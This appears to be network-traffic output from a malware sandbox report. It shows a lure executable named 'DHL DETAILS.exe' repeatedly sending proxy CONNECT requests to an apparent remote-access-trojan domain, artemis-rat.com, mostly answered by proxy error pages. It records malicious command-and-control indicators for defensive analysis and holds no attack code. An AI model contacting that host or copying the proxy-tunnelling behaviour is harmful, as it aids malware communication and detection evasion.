                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    271192.168.2.55120141.86.252.914436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.259509087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    272192.168.2.551202202.159.60.654436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.260350943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    273192.168.2.551207202.159.60.654436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.261432886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    274192.168.2.55120841.86.252.914436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.261575937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    275192.168.2.55121141.86.252.914436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.263442039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    276192.168.2.55121341.86.252.914436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.264744043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    277192.168.2.550738125.94.219.9690916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.267013073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.607089043 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    278192.168.2.550963172.67.181.149806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.271764994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.427676916 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    279192.168.2.550962104.16.143.127806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.271975040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.427602053 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    280192.168.2.550973104.25.231.184806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.274331093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.430671930 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    281192.168.2.55075137.18.73.6055666352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.274348974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.642205000 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    282192.168.2.550974172.67.181.11806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.274583101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.430356979 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    283192.168.2.550713154.85.125.23564466352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.280237913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.913292885 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    284192.168.2.55094950.63.12.33614646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.280323982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.739379883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.270613909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.333127975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.567837954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    285192.168.2.550988104.20.56.71806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.280801058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.436382055 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    286192.168.2.551004104.16.105.15806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.287476063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.443212986 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    287192.168.2.550707171.244.140.16095376352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.288590908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.051816940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.161232948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.380285025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.880274057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    288192.168.2.55101323.227.38.198806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.291945934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.447725058 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    289192.168.2.550473117.160.250.134806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.291990995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.826493979 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


